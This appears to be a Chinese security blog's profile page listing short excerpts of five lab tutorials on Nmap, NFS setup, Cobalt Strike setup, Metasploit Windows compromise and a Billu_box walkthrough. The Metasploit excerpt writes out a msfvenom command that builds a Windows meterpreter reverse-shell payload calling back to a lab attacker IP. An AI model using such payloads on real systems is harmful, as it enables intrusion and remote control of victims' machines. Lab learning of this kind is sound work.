- 博客(5)
- 收藏
- 关注
原创 Nmap工具使用参数详解
Nmap简介nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap常用参数nmap –iflist
2021-01-16 12:47:26
628
1
原创 Linux搭建NFS傻瓜式教程
NFS简介NFS一般指网络文件系统,NFS可用于不同类型计算机、操作系统、网络架构和传输协议运行环境中的网络文件远程访问和共享,通过使用NFS,用户和程序可以像访问本地文件一样访问远端系统上的文件,使得每个计算机的节点能够像使用本地资源一样方便地使用网上资源。换言之,NFS可用于不同类型计算机、操作系统、网络架构和传输协议运行环境中的网络文件远程访问和共享。环境部署测试向准备两台centos7的系统机器,一台作为服务端,一台作为客户端服务端ip:141.164.42.234客户端ip:192.1
2021-01-15 22:38:56
380
原创 Cobalt Strike 环境搭建与一次简单的上线教程
环境部署服务器端:Kali客户端:Win10靶机:Win7注意:CS基于java环境,首先安装java,jdk1.8CS安装将准备好的cs4.0压缩包拷贝到Kali中,解压后可以看到cs的目录结构赋予 teamserver 执行权限chmod +x teamsercer运行方式:服务端ip,并且设置连接密码./teamserver 192.168.20.106 123456如下图所示,cs就已经安装成功,进入等待客户端连接的状态。。。(默认50050端口)Windows客户端
2021-01-08 21:49:20
8924
2
原创 利用msf实现windows的上线与提权
环境部署攻击机:Kali ip:192.168.208.138靶机:Win7(x64) ip:192.168.208.142Payload (因为是靶机测试,可以在Kali开启apache2服务或者使用WinSCP将木马传入目标靶机,方便后面监听)msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.138 LPORT=6666 -f exe > reverse.exe开启监听use exploit/mult
2021-01-07 21:30:30
1894
原创 Billu_box靶场实战演练
部署环境虚拟机:Kali ip:192.168.202.138靶机:Billu_box ip:192.168.202.140信息收集1、通过nmap扫描发现靶机ip地址:192.168.202.140开放了22、80端口中间件:Apache/2.2.22 (Ubuntu)操作系统:Linux2、通过Kali自带的DIRB工具+字典扫描目录漏洞发现通过目录扫描发现了phpinfo**phpmyadmin界面,注意的是扫描目录为“phpmy”发现“file”内容的网址,发现任意
2021-01-05 22:17:14
745
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人